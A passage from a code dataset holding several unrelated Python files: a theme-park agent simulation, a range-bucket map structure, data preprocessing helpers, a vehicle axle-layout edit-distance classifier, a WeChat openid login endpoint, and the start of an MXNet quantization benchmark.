\"\"\"\n        Returns a dictionary of attraction-ids with their waiting lines as values.\n        \"\"\"\n        people = self.model.calculate_people_sorted()\n        return people\n\n    def update_strategy(self):\n        \"\"\"\n        Updates the strategy by evaluating the attractions chosen by all other\n        strategies. The strategy that would have resulted in the earliest access\n        to a ride is chosen as the next strategy. 
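A strategy counts as better\n        only if its predicted ride would already have finished before the\n        current simulation step. 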
Only used if adaptive = True.\n        \"\"\"\n\n        # dictionary of strategies that were better than the current one\n        strategy_ranking = {}\n        queues = self.get_waiting_lines()\n        chosen_strategy = self.weight\n        current_walking_distance = self.prediction_strategies[chosen_strategy][1]\n        current_arrival_time = math.ceil(self.prediction_strategies[chosen_strategy][2])\n\n        if self.current_a is not None:\n\n            for strategy in self.prediction_strategies.keys():\n\n                # no need to compare the current strategy to itself\n                if strategy == chosen_strategy:\n                    continue\n\n                attraction = self.prediction_strategies[strategy][0]\n                arrival_time = math.ceil(self.prediction_strategies[strategy][2])\n                walking_distance = self.prediction_strategies[strategy][1]\n\n                # if the strategy predicted the same attraction, the old strategy\n                # is preferred\n                if attraction == self.current_a:\n                    continue\n\n                # if the arrival time at the predicted attraction isn't in the future\n                if math.ceil(arrival_time) < self.model.totalTOTAL:\n\n                    queue_at_arrival = self.model.attraction_history[attraction][math.ceil(arrival_time)]\n\n                    # if the ride would have been finished earlier, add this strategy to the ranking\n                    if arrival_time + queue_at_arrival + attraction.attraction_duration < self.model.totalTOTAL:\n\n                        strategy_ranking[strategy] = arrival_time + queue_at_arrival\n\n            # choose the strategy with the best time\n            if len(strategy_ranking.values()) > 0:\n                minval = min(strategy_ranking.values())\n                res = [k for k, v in strategy_ranking.items() if v == minval]\n                if len(res) == 1:\n                    best_strat = res[0]\n                else:\n\n                    # if two strategies had the same outcome, choose randomly\n                    best_strat = random.choice(res)\n                self.weight = best_strat\n\n    def step(self):\n        \"\"\"\n        This method moves the customer using the `move()` method.\n        \"\"\"\n\n        # updates the data on the attraction occupation\n        if self.in_attraction is True:\n            self.in_attraction_list.append(1)\n        else:\n            self.in_attraction_list.append(0)\n\n        self.move()\n\n    def use_strategy(self):\n        \"\"\"\n        This method returns the attraction predicted by the current strategy of\n        the customer. 
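The cost of an attraction is a weighted sum of its\n        walking distance and queue length, balanced by self.weight. 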
Adds a deterministic penalty per attraction based\n        on the penalty method.\n        \"\"\"\n\n        # add walking times\n        predictions = self.get_walking_distances()\n\n        # add waiting times\n        waiting_times = self.get_waiting_lines()\n\n        # make a prediction based on the current strategy for all attractions\n        for i in range(len(predictions.keys())):\n            predictions[i] = predictions[i] * (1 - self.weight) + waiting_times[i] * self.weight\n\n        # use a fraction of the attraction with the highest cost as a penalty\n        maxval = max(predictions.values())\n        for attraction_nr in predictions:\n            penalty = self.penalty(self.model.attractions[attraction_nr])\n            predictions[attraction_nr] = predictions[attraction_nr] + maxval * penalty\n\n        # choose the attraction with the lowest cost\n        minval = min(predictions.values())\n        res = [k for k, v in predictions.items() if v == minval]\n        if len(res) == 1:\n            predicted_attraction = res[0]\n        else:\n\n            # if attractions have the same cost, choose one randomly\n            predicted_attraction = random.choice(res)\n\n        attraction_object = self.model.get_attractions()[predicted_attraction]\n\n        # make predictions for all strategies\n        self.prediction_strategies = self.prediction_all_strategies()\n\n        return self.model.attractions[predicted_attraction]\n\n    def prediction_all_strategies(self):\n        \"\"\"\n        Makes a prediction for all possible strategies.\n        Returns a dictionary with the strategies as keys and the attractions,\n        predictions and arrival times as values\n        \"\"\"\n\n        prediction_per_strategy = {}\n\n        # add walking distances\n        predictions = self.get_walking_distances()\n\n        # add waiting times\n        waiting_times = self.get_waiting_lines()\n\n        # make a prediction for all strategies\n        for weight in self.all_strategies:\n\n            # make a prediction based on the current strategy for all attractions\n            for i in range(len(predictions.keys())):\n\n                if self.weight is None:\n                    predictions[i] = predictions[i] + waiting_times[i]\n                else:\n                    predictions[i] = predictions[i] * (1 - weight) + waiting_times[i] * weight\n\n            # use a fraction of the attraction with the highest cost as a penalty\n            maxval = max(predictions.values())\n            for attraction_nr in predictions:\n                penalty = self.penalty(self.model.attractions[attraction_nr])\n\n                predictions[attraction_nr] = predictions[attraction_nr] + maxval * penalty\n\n            # choose the attraction with the lowest cost\n            minval = min(predictions.values())\n            res = [k for k, v in predictions.items() if v == minval]\n            if len(res) == 1:\n                predicted_attraction = res[0]\n            else:\n\n                # if attractions have the same cost, choose randomly\n                predicted_attraction = random.choice(res)\n\n            attraction_object = self.model.get_attractions()[predicted_attraction]\n            predictions = self.get_walking_distances()\n            arrival_time = self.model.totalTOTAL + predictions[predicted_attraction]\n\n            # add to dictionary\n            prediction_per_strategy[weight] = [self.model.attractions[predicted_attraction], predictions[predicted_attraction],\n                                               arrival_time]\n        return prediction_per_strategy\n","repo_name":"AnnemijnD/ABMFinal","sub_path":"models/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":15650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73778501279","text":"from bisect import bisect_left\nfrom collections import deque\nfrom collections.abc import Hashable\nfrom sdata.contrib.ranger.collections.rangemap import RangeMap\nfrom sdata.contrib.ranger.range.range import Range\nfrom sdata.contrib.ranger.range.cut import Cut\n\nclass RangeBucketMap(RangeMap):\n    \"\"\" Class used to 
represent a mapping of disjoint ranges to sets of items. Ranges\n do not coalesce. However, if a new Range is added over an existing Range, items\n belonging to the existing Range are retained in that Range\n \"\"\"\n\n def __init__(self, range_dict=None):\n \"\"\" Instantiates a RangeBucketMap\n\n Parameters\n ----------\n range_dict : Dictionary of Range -> object\n Dictionary to start off the RangeBucketMap with\n \"\"\"\n self.recurse_add = False\n super(RangeBucketMap, self).__init__(range_dict)\n\n def iteritems(self, start=None, end=None):\n \"\"\" Iterates over pairs of (Range, value)\n\n Parameters\n ----------\n start : comparable, optional\n The starting point for iterating, inclusive\n end : comparable, optional\n The ending point for iterating, inclusive\n\n Returns\n -------\n Generator of (Range intersecting [start,end], value), ordered by start point\n \"\"\"\n if start is None:\n start = self.lower_cuts[0]\n else:\n start = Cut.below_value(start)\n if end is None:\n end = self.upper_cuts[-1]\n else:\n end = Cut.above_value(end)\n bounding_range = Range(start, end)\n # Get the bounding indices\n ovlapLowerInd = max(bisect_left(self.lower_cuts, start) - 1, 0)\n ovlapUpperInd = bisect_left(self.lower_cuts, end)\n # Create queue of values that need to be generated\n yield_vals = deque()\n # Create dictionary of values to be generated -> indices containing them\n vals_inds_dict = {}\n for i in range(ovlapLowerInd, ovlapUpperInd):\n # Check if anything can be released from the queue\n while len(yield_vals) > 0:\n if vals_inds_dict[yield_vals[0]][-1] < i - 1:\n # Yield the full range, value. Remove value from queue\n val = yield_vals.popleft()\n yield Range(max(self.lower_cuts[vals_inds_dict[val][0]], start),\n min(self.upper_cuts[vals_inds_dict[val][-1]], end)), val\n # Remove value from dict\n del vals_inds_dict[val]\n else:\n break\n try:\n # Get intersection of the ranges\n intersect = bounding_range.intersection(self.ranges[i])\n if not intersect.is_empty():\n # If overlapping with this range, put into queue\n for val in self.items[i]:\n if val not in vals_inds_dict:\n yield_vals.append(val)\n vals_inds_dict[val] = deque()\n vals_inds_dict[val].append(i)\n except ValueError:\n # Continue if no overlap with this range\n continue\n ## Yield remaining values\n while len(yield_vals) > 0:\n # Yield the full range, value. Remove value from queue\n val = yield_vals.popleft()\n yield Range(max(self.lower_cuts[vals_inds_dict[val][0]], start),\n min(self.upper_cuts[vals_inds_dict[val][-1]], end)), val\n # Remove value from dict\n del vals_inds_dict[val]\n\n def get(self, key):\n \"\"\" Get the item(s) corresponding to a given key. 
The key can be a\n        Range or a single value that is within a Range\n\n        Parameters\n        ----------\n        key : comparable\n            A single value or Range object\n\n        Raises\n        ------\n        KeyError\n            If there is no overlap with the key\n        ValueError\n            If the key type is not compatible with the ranges\n\n        Returns\n        -------\n        A set containing all overlapping items\n        \"\"\"\n        if not self.overlaps(key):\n            self.__missing__(key)\n        elif isinstance(key, Range):\n            # If this is a Range\n            return_set = set()\n            # Get the bounding indices\n            ovlapLowerInd = max(bisect_left(self.lower_cuts, key.lower_cut) - 1, 0)\n            ovlapUpperInd = bisect_left(self.lower_cuts, key.upper_cut)\n            for i in range(ovlapLowerInd, ovlapUpperInd):\n                try:\n                    # Get intersection of the ranges\n                    intersect = key.intersection(self.ranges[i])\n                    if not intersect.is_empty():\n                        # If overlapping with this range, put its\n                        # item in the return set\n                        return_set = return_set.union(self.items[i])\n                except ValueError:\n                    # Continue if no overlap with this range\n                    continue\n            # Return the set of items\n            return return_set\n        else:\n            # If this is a single value\n            # Get the index of the range containing the value\n            lower_ind = max(bisect_left(self.lower_cuts, key) - 1, 0)\n            # Return the item at that value\n            return self.items[lower_ind]\n\n    def put(self, key, val):\n        \"\"\" Creates a mapping from a Range to a value, adding to\n        any existing values over that Range\n\n        Parameters\n        ----------\n        key : Range object\n            A Range to serve as a key\n        val : value, hashable\n            Some value that the Range should map to\n\n        Raises\n        ------\n        TypeError\n            If the key is not a Range object or the value is not hashable\n        \"\"\"\n        if not isinstance(key, Range):\n            raise TypeError(\"key is not a Range\")\n        elif not any((isinstance(val, Hashable), self.recurse_add)):\n            raise TypeError(\"value not hashable\")\n        elif key.is_empty():\n            # Skip if this is an empty range\n            return\n        # Figure out where to put the key/value\n        if not self.overlaps(key):\n            # If this range is completely on its own, just insert\n            insert_ind = bisect_left(self.lower_cuts, key.lower_cut)\n            self.ranges.insert(insert_ind, key)\n            self.lower_cuts.insert(insert_ind, key.lower_cut)\n            self.upper_cuts.insert(insert_ind, key.upper_cut)\n            if not isinstance(val, set):\n                self.items.insert(insert_ind, set([val]))\n            else:\n                self.items.insert(insert_ind, val)\n            return\n        else:\n            # If this range has some overlap with existing ranges\n            ovlap_lower_ind = max(bisect_left(self.lower_cuts, key.lower_cut) - 1, 0)\n            ovlap_upper_ind = bisect_left(self.lower_cuts, key.upper_cut)\n            # Create queue of ranges to add\n            add_ranges = deque()\n            # Create queue of items to add\n            add_items = deque()\n            # Keep track of the next lower cutpoint to add\n            next_lower_cut = key.lower_cut\n            for i in range(ovlap_lower_ind, ovlap_upper_ind):\n                try:\n                    # Get intersection of the ranges\n                    intersect = key.intersection(self.ranges[i])\n                    if not intersect.is_empty():\n                        # Add in a Range between the next lower cut and\n                        # the beginning of this intersection if necessary\n                        if next_lower_cut < intersect.lower_cut:\n                            add_ranges.append(Range(next_lower_cut, intersect.lower_cut))\n                            add_items.append(val)\n                            next_lower_cut = intersect.lower_cut\n                        if intersect == self.ranges[i]:\n                            ## If key encompasses existing Range ##\n                            # Add item to this range\n                            self.items[i].add(val)\n                            # Change the next lower cut\n                            next_lower_cut = intersect.upper_cut\n                        elif self.lower_cuts[i] == intersect.lower_cut:\n                            ## If key upper cutpoint enclosed by existing Range ##\n                            # Add in the rest of the original Range\n                            if self.upper_cuts[i] > 
intersect.upper_cut:\n add_ranges.append(Range(intersect.upper_cut,\n self.upper_cuts[i]))\n add_items.append(set(self.items[i]))\n # Define original part to be shorter \n self.upper_cuts[i] = intersect.upper_cut\n self.ranges[i] = Range(self.lower_cuts[i],\n intersect.upper_cut)\n self.items[i].add(val)\n # Change the next lower cut\n next_lower_cut = intersect.upper_cut\n elif self.upper_cuts[i] == intersect.upper_cut:\n ## If key lower cutpoint enclosed by existing Range ##\n # Add in the rest of the original Range\n if intersect.lower_cut > self.lower_cuts[i]:\n add_ranges.append(Range(self.lower_cuts[i], intersect.lower_cut))\n add_items.append(set(self.items[i]))\n # Define original part to be shorter\n self.lower_cuts[i] = intersect.lower_cut\n self.ranges[i] = Range(self.lower_cuts[i],\n intersect.upper_cut)\n self.items[i].add(val)\n # Change the next lower cut\n next_lower_cut = intersect.upper_cut\n else:\n # If entire key enclosed by existing Range\n # Add in lower part of original Range\n add_ranges.append(Range(self.lower_cuts[i], intersect.lower_cut))\n add_items.append(set(self.items[i]))\n # Add in upper part of original Range\n add_ranges.append(Range(intersect.upper_cut, self.upper_cuts[i]))\n add_items.append(set(self.items[i]))\n # Define original part to be middle\n self.lower_cuts[i] = intersect.lower_cut\n self.upper_cuts[i] = intersect.upper_cut\n self.ranges[i] = Range(intersect.lower_cut, intersect.upper_cut)\n self.items[i].add(val)\n # Change the next lower cut\n next_lower_cut = intersect.upper_cut\n except ValueError:\n # Continue if no overlap with this range\n continue\n # Put in a last range if necessary\n if next_lower_cut < key.upper_cut:\n add_ranges.append(Range(next_lower_cut, key.upper_cut))\n add_items.append(val)\n # Use recursive call to place the pairs, which now\n # should not overlap with any other ranges\n self.recurse_add = True\n while len(add_ranges) > 0:\n self.put(add_ranges.pop(), add_items.pop())\n self.recurse_add = False\n\n def remove(self, a_range):\n \"\"\" Removes a range and its value(s) from the range set\n\n Parameters\n ----------\n a_range : A Range object\n The Range to remove\n\n Raises\n ------\n ValueError\n If removing range of type not compatible with previously\n added ranges\n TypeError\n If not a Range\n \"\"\"\n if not isinstance(a_range, Range):\n raise TypeError(\"a_range is not a Range\")\n elif a_range.is_empty():\n # Skip if this is an empty range\n return\n # Check for compatibility of types if necessary\n if len(self) > 0:\n if not (issubclass(a_range.lower_cut.the_type,\n self.ranges[0].lower_cut.the_type) or \\\n issubclass(self.ranges[0].lower_cut.the_type,\n a_range.lower_cut.the_type)):\n raise ValueError(\"Range not compatible with previously added ranges\")\n # Check if the range actually overlaps with the key set\n if not self.overlaps(a_range):\n return\n else:\n # There's some overlap, so deal with that\n # Determine where overlap occurs\n ovlap_lower_ind = max(bisect_left(self.lower_cuts,\n a_range.lower_cut) - 1, 0)\n ovlap_upper_ind = bisect_left(self.lower_cuts, a_range.upper_cut)\n # Create queue of indices marked for removal\n remove_ranges = deque()\n # Create queue of ranges to add\n add_ranges = deque()\n # Create queue of items to add with the add_ranges\n add_items = deque()\n for i in range(ovlap_lower_ind, ovlap_upper_ind):\n try:\n # Get intersection of the ranges\n intersect = a_range.intersection(self.ranges[i])\n if not intersect.is_empty():\n if intersect == self.ranges[i]:\n # 
Mark range for removal\n remove_ranges.append(i)\n elif self.lower_cuts[i] == intersect.lower_cut:\n # If equal on the left cutpoint, subtract\n # out left part\n self.lower_cuts[i] = intersect.upper_cut\n self.ranges[i] = Range(intersect.upper_cut,\n self.upper_cuts[i])\n elif self.upper_cuts[i] == intersect.upper_cut:\n # If equal on right cutpoint, subtract out\n # right part\n self.upper_cuts[i] = intersect.lower_cut\n self.ranges[i] = Range(self.lower_cuts[i],\n intersect.lower_cut)\n else:\n # If in the middle, split into two parts, putting\n # both in add queue and placing the old range index\n # into the remove queue\n add_ranges.append(Range(self.lower_cuts[i],\n intersect.lower_cut))\n add_items.append(set(self.items[i]))\n add_ranges.append(Range(intersect.upper_cut,\n self.upper_cuts[i]))\n add_items.append(set(self.items[i]))\n remove_ranges.append(i)\n except ValueError:\n # Continue if no overlap with this range\n continue\n # Remove any ranges that are marked for removal\n while len(remove_ranges) > 0:\n remove_ind = remove_ranges.pop()\n self.ranges.pop(remove_ind)\n self.lower_cuts.pop(remove_ind)\n self.upper_cuts.pop(remove_ind)\n self.items.pop(remove_ind)\n # Add any pairs that need to be added\n self.recurse_add = True\n while len(add_ranges) > 0:\n self.put(add_ranges.pop(), add_items.pop())\n self.recurse_add = False\n","repo_name":"lepy/sdata","sub_path":"sdata/contrib/ranger/collections/rangebucketmap.py","file_name":"rangebucketmap.py","file_ext":"py","file_size_in_byte":16130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"18345225609","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 24 11:42:23 2018\n\n@author: Margarida Costa\n\"\"\"\nimport pandas as pd\n# loading libraries\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom imblearn.over_sampling import SMOTE,RandomOverSampler\nfrom imblearn.under_sampling import RandomUnderSampler\nimport matplotlib.pyplot as plt\n\n\ndef plot_2d_space(X, y, label='Classes'): \n colors = ['#1F77B4', '#FF7F0E']\n markers = ['o', 's']\n for l, c, m in zip(np.unique(y), colors, markers):\n plt.scatter(\n X[y==l, 0],\n X[y==l, 1],\n c=c, label=l, marker=m\n )\n plt.title(label)\n plt.legend(loc='upper right')\n plt.show()\n\n#Returns the data file. The class cls is obligatory for the method meanByClass and medianByClass\ndef treatMissingValues(df, method, cl=None):\n if method == \"constant\":\n #1. use a global constant to fill in for missing values\n df = df.fillna(-1)\n elif method == \"mean\":\n #2. use attribute mean (or median if its discrete) for that column with na\n df = df.fillna(df.mean())\n elif method == \"meanByClass\":\n #3. use attribute mean (or median if its discrete) for the rows with certain class of the column with na\n for el in df[cl].unique():\n for col in df.columns[df.isna().any()].tolist():\n df = df.fillna(df.loc[el,col].mean())\n \n \n elif method == \"clustering\":\n #todo\n pass\n elif method == \"drop\": \n #6. Dropping axis labels with missing data\n df = df.dropna(axis=1)\n elif method == \"interpolation\": \n #5. interpolation\n df = df.interpolate()\n elif method == \"median\":\n #6. use attribute median for that column with na\n df = df.fillna(df.median())\n elif method == \"medianByClass\":\n #7. 
use attribute median for the rows with a certain class of the column with na\n        for el in df[cl].unique():\n            for col in df.columns[df.isna().any()].tolist():\n                df = df.fillna(df.loc[el,col].median())\n            \n    return df\n\n#Use for symbolic attributes with just 2 possible values. Doesn't create new columns. Returns the data file.\ndef treatSymbolicBinaryAtts(df, att, positiveClass):\n    print(\"att\", att)\n    df[att] = np.array([ 1 if v == positiveClass else 0 for v in df[att] ])\n    return df\n\n#Use for symbolic attributes with more than 2 possible values. Creates new columns with binary values for each symbolic class. Returns the data file.\ndef treatSymbolicAtt(df):\n    label_encoder = LabelEncoder()\n    dummy_encoder = OneHotEncoder()\n    pdf = pd.DataFrame()\n    for att in df.columns:\n        if df[att].dtype == np.float64 or df[att].dtype == np.int64:\n            pdf = pd.concat([pdf, df[att]], axis=1)\n        else:\n            if len(df[att].unique()) != 2:\n                df[att] = label_encoder.fit_transform(df[att])\n                # Fitting One Hot Encoding on train data\n                temp = dummy_encoder.fit_transform(df[att].values.reshape(-1,1)).toarray()\n                # Changing encoded features into a dataframe with new column names\n                temp = pd.DataFrame(temp,\n                                    columns=[(att + \"_\" + str(i)) for i in df[att].value_counts().index])\n                # In side by side concatenation index values should be same\n                # Setting the index values similar to the data frame\n                temp = temp.set_index(df.index.values)\n                # adding the new One Hot Encoded variables to the dataframe\n                pdf = pd.concat([pdf, temp], axis=1)\n    \n    \n    \n    return pdf\n\t\n#Returns the new X and y of the balanced data.\ndef treatUnbalancedData(df, method):\n    X_train = df.drop( 'class', axis=1 ).values\n    y_train = df[ 'class' ].values\n    X_new = 0\n    y_new = 0\n    if method == \"SMOTE\":\n        sm = SMOTE(random_state=12, ratio = 1.0)\n        X_new, y_new = sm.fit_sample(X_train, y_train)\n        #plot_2d_space(X_new, y_new, 'SMOTE')\n        \n    #random oversampling\n    elif method == \"oversampling\":\n        ros = RandomOverSampler()\n        X_new, y_new = ros.fit_sample(X_train, y_train)\n        print(X_new.shape[0] - X_train.shape[0], 'new randomly picked points')\n        #plot_2d_space(X_new, y_new, 'Random over-sampling')\n    elif method == \"undersampling\":\n        #random undersampling\n        rus = RandomUnderSampler(return_indices=True)\n        X_new, y_new, id_rus = rus.fit_sample(X_train, y_train)\n        print('Removed indexes:', id_rus)\n        #plot_2d_space(X_new, y_new, 'Random under-sampling')\n\n    return X_new, y_new\n","repo_name":"pcostam/CD","sub_path":"proj/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"11992693688","text":"\"\"\"\nThis method was based on these papers:\n\n[1] OOMMEN, B. John; LOKE, Richard KS. Pattern recognition of strings with\nsubstitutions, insertions, deletions and generalized transpositions.\nPattern Recognition, 1997, vol. 30, no 5, p. 789-800.\n\n[2] D.W. van Boxel, MSc and Ing. R.A. van Lieshout, MSc. Optimization Vehicle\nClassification, 2003.\n\n[3] VAN BOXEL, D. W.; VAN LIESHOUT, R. A.; VAN DOORN, R. 
A.\nWeigh-in-Motion–Categorising vehicles.\n\n\"\"\"\nimport numpy as np\nimport numba as nb\n\n\ndef layout(data):\n    \"\"\"\n    Distances data in meters (veh_length, *axle_sep)\n\n    The first value of the list is the vehicle's length.\n\n    :param data: values of vehicle's length and axle distances\n    :type data: tuple of float\n    \"\"\"\n    ms_layout = '-O'\n    cum_length = 100\n\n    veh_length, *axle_sep = data\n    veh_length *= 100\n    axle_sep = [x*100 for x in axle_sep]\n\n    axle_count = len(axle_sep) + 1\n\n    i = 0\n    limit_i = axle_count - 1\n    while i < limit_i:\n        j = 0\n        limit_j = axle_sep[i] // 50\n        while j < limit_j:\n            ms_layout += '-'\n            j += 1\n        ms_layout += 'O'\n        cum_length = cum_length + axle_sep[i] + 50\n        i += 1\n\n    ms_layout += '-'\n    cum_length += 50\n\n    i = 0\n    limit_i = ((veh_length - cum_length) // 50) - 0\n    while i < limit_i:\n        ms_layout += '-'\n        i += 1\n\n    return ms_layout\n\n\ndef layout_to_int(vehicle_layout):\n    layout_int = []\n    for letter in vehicle_layout:\n        layout_int.append(ord(letter))\n    return np.array(layout_int, dtype=int)\n\n\n@nb.njit(nb.i8(nb.int8, nb.int8))\ndef d_s(a, b):\n    \"\"\"\n    d_s is a map from A x A -> R^+ and is called the Substitution Map. In\n    particular, d_s(a, b) is the distance associated with substituting\n    b for a, a,b ∈ A. For all a ∈ A, d_s(a, a) is generally assigned the value\n    zero, although this is not mandatory.\n\n    \"\"\"\n    tilde = 126 # ~ 126\n    hyphen = 45 # - 45\n    star = 42 # * 42\n    return (\n        0 if a == b else\n        0 if a == tilde and b == hyphen else # '~' '-'\n        0 if a == hyphen and b == tilde else # '-' '~'\n        0 if a == star and b == hyphen else # '*' '-'\n        0 if a == hyphen and b == star else # '-' '*'\n        100\n    )\n\n\n@nb.njit(nb.i8(nb.int8))\ndef d_i(a):\n    \"\"\"\n    d_i(.) is a map from A -> R^+ and is called the Insertion Map. The quantity\n    d_i(a) is the distance associated with inserting the symbol a ∈ A.\n\n    \"\"\"\n    tilde = 126 # ~ 126\n    hyphen = 45 # - 45\n    star = 42 # * 42\n    return (\n        2 if a == hyphen else # '-'\n        1 if a == tilde else # '~'\n        3 if a == star else # '*'\n        100\n    )\n\n\n@nb.njit(nb.i8(nb.int8))\ndef d_e(a):\n    \"\"\"\n    d_e(.) is a map from A -> R^+ and is called the Deletion or Erasure Map.\n    The quantity d_e(a) is the distance associated with deleting (or erasing)\n    the symbol a ∈ A.\n\n    \"\"\"\n    tilde = 126 # ~ 126\n    hyphen = 45 # - 45\n    star = 42 # * 42\n    return (\n        2 if a == hyphen else # '-'\n        1 if a == tilde else # '~'\n        3 if a == star else # '*'\n        100\n    )\n\n\n@nb.njit(nb.i8(nb.int8, nb.int8, nb.int8, nb.int8))\ndef d_t(a, b, c, d):\n    \"\"\"\n    d_t(.,.) is a map from A^2 x A^2 -> R^+ called the Transposition Map. The\n    quantity d_t(ab, cd) is the distance associated with transposing the string\n    \"ab\" into \"cd\". 
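For example, d_t(ab, ba) = 2\n    whenever a != b, since only a swap of the two characters is needed. 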
This can be thought of as a \"serial\" operation: \"ab\" is\n    first transposed to \"ba\" and subsequently the individual characters are\n    substituted.\n\n    \"\"\"\n    return (\n        0 if a == b and a == c and a == d else\n        2 if a == d and b == c else\n        d_s(a, d) + d_s(b, c)\n    )\n\n\n@nb.njit()\ndef D(x, y, Z):\n    \"\"\"\n\n    Input: The strings X = x_1...x_N and Y = y_1...y_M, and the set of\n    elementary edit distances defined using the four elementary functions\n    d_s(.,.), d_i(.), d_e(.), d_t(.,.).\n    Output: The distance D(X, Y) associated with editing X to Y using the SID\n    and GT operations.\n    :param x:\n    :param y:\n    :param Z: np.zeros((N, M))\n    \"\"\"\n    N = len(x)\n    M = len(y)\n\n    # Z = np.zeros((N, M))\n    i = 1\n    while i < N:\n        Z[i, 0] = Z[i-1, 0] + d_e(x[i])\n        i += 1\n\n    j = 1\n    while j < M:\n        Z[0, j] = Z[0, j-1] + d_i(y[j])\n        j += 1\n\n    i = 1\n    while i < N:\n        Z[i, 1] = min(\n            Z[i-1, 1] + d_e(x[i]), Z[i, 0] + d_i(y[1]),\n            Z[i-1, 0] + d_s(x[i], y[1])\n        )\n        i += 1\n\n    j = 2\n    while j < M:\n        Z[1, j] = min(\n            Z[1, j-1] + d_i(y[j]), Z[0, j] + d_e(x[1]),\n            Z[0, j-1] + d_s(x[1], y[j])\n        )\n        j += 1\n\n    i = 2\n    while i < N:\n        j = 2\n        while j < M:\n            Z[i, j] = min(\n                Z[i-1, j] + d_e(x[i]),\n                Z[i, j-1] + d_i(y[j]),\n                Z[i-1, j-1] + d_s(x[i], y[j]),\n                Z[i-2, j-2] + d_t(x[i-1], x[i], y[j-1], y[j])\n            )\n            j += 1\n        i += 1\n    return Z[N-1, M-1]\n","repo_name":"OpenWIM/pywim","sub_path":"pywim/estimation/vehicular_classification/dww.py","file_name":"dww.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"6835799677","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/10/18\n# @Author : Sanzro Lee\n# @Contact : sanzrolee@gmail.com\n# @File : MiniProgremCode.py\n# @Software: PyCharm\n\"\"\"\nWeChat Mini Program data operations\n\"\"\"\n\nfrom fastapi import APIRouter\n# get the openid of a WeChat Mini Program user\nimport requests\n\n# The Mini Program ID is a test account, so the phone number cannot be obtained; hence this import is commented out\n# from WXBizDataCrypt import WXBizDataCrypt\n\nrouter = APIRouter()\n\n\n# obtain the openid for a WeChat Mini Program\n@router.post('/api/code', summary=\"obtain the Mini Program openid\")\ndef user_wxlogin(appid, secret, code):\n    params = {\n        'appid': appid,\n        'secret': secret,\n        'js_code': code,\n        'grant_type': 'authorization_code'\n    }\n    url = 'https://api.weixin.qq.com/sns/jscode2session'\n    r = requests.get(url, params=params)\n    openid = r.json().get('openid', '')\n    session_key = r.json().get('session_key', '')\n    return {'openid': openid, 'session_key': session_key}\n","repo_name":"Sanzro-Lee/HELPER_FACTION_official_back_end_api","sub_path":"app/api/v1/MiniProgremCode/MiniProgremCode.py","file_name":"MiniProgremCode.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41167494959","text":"import argparse\nimport logging\nimport os\nimport time\nimport numpy as np\nimport mxnet as mx\nfrom mxnet import nd\nfrom mxnet.contrib.quantization import *\n\n\ndef download_dataset(dataset_url, dataset_dir, logger=None):\n    if logger is not None:\n        logger.info('Downloading dataset for inference from %s to %s' % (dataset_url, dataset_dir))\n    mx.test_utils.download(dataset_url, dataset_dir)\n\n\ndef load_model(symbol_file, param_file, logger=None):\n    cur_path = os.path.dirname(os.path.realpath(__file__))\n    symbol_file_path = os.path.join(cur_path, symbol_file)\n    if logger is not None:\n        logger.info('Loading symbol from file %s' % symbol_file_path)\n    symbol = mx.sym.load(symbol_file_path)\n\n    param_file_path = os.path.join(cur_path, 
param_file)\n if logger is not None:\n logger.info('Loading params from file %s' % param_file_path)\n save_dict = nd.load(param_file_path)\n arg_params = {}\n aux_params = {}\n for k, v in save_dict.items():\n tp, name = k.split(':', 1)\n if tp == 'arg':\n arg_params[name] = v\n if tp == 'aux':\n aux_params[name] = v\n return symbol, arg_params, aux_params\n\n\ndef advance_data_iter(data_iter, n):\n assert n >= 0\n if n == 0:\n return data_iter\n has_next_batch = True\n while has_next_batch:\n try:\n data_iter.next()\n n -= 1\n if n == 0:\n return data_iter\n except StopIteration:\n has_next_batch = False\n\n\ndef score(sym, arg_params, aux_params, data, devs, label_name, max_num_examples, logger=None):\n metrics = [mx.metric.create('acc'),\n mx.metric.create('top_k_accuracy', top_k=5)]\n if not isinstance(metrics, list):\n metrics = [metrics, ]\n mod = mx.mod.Module(symbol=sym, context=devs, label_names=[label_name, ])\n mod.bind(for_training=False,\n data_shapes=data.provide_data,\n label_shapes=data.provide_label)\n mod.set_params(arg_params, aux_params)\n\n tic = time.time()\n num = 0\n for batch in data:\n mod.forward(batch, is_train=False)\n for m in metrics:\n mod.update_metric(m, batch.label)\n num += batch_size\n if max_num_examples is not None and num >= max_num_examples:\n break\n\n speed = num / (time.time() - tic)\n\n if logger is not None:\n logger.info('Finished inference with %d images' % num)\n logger.info('Finished with %f images per second', speed)\n logger.warn('Note: GPU performance is expected to be slower than CPU. Please refer quantization/README.md for details')\n for m in metrics:\n logger.info(m.get())\n\n\ndef benchmark_score(symbol_file, ctx, batch_size, num_batches, data_layer_type, logger=None):\n # get mod\n cur_path = os.path.dirname(os.path.realpath(__file__))\n symbol_file_path = os.path.join(cur_path, symbol_file)\n if logger is not None:\n logger.info('Loading symbol from file %s' % symbol_file_path)\n sym = mx.sym.load(symbol_file_path)\n mod = mx.mod.Module(symbol=sym, context=ctx)\n if data_layer_type == \"int8\":\n dshape = mx.io.DataDesc(name='data', shape=(\n batch_size,) + data_shape, dtype=np.int8)\n elif data_layer_type == 'uint8':\n dshape = mx.io.DataDesc(name='data', shape=(\n batch_size,) + data_shape, dtype=np.uint8)\n else: # float32\n dshape = mx.io.DataDesc(name='data', shape=(\n batch_size,) + data_shape, dtype=np.float32)\n mod.bind(for_training=False,\n inputs_need_grad=False,\n data_shapes=[dshape])\n mod.init_params(initializer=mx.init.Xavier(magnitude=2.))\n\n # get data\n if data_layer_type == \"float32\":\n data = [mx.random.uniform(-1.0, 1.0, shape=shape, ctx=ctx, dtype=data_layer_type)\n for _, shape in mod.data_shapes]\n 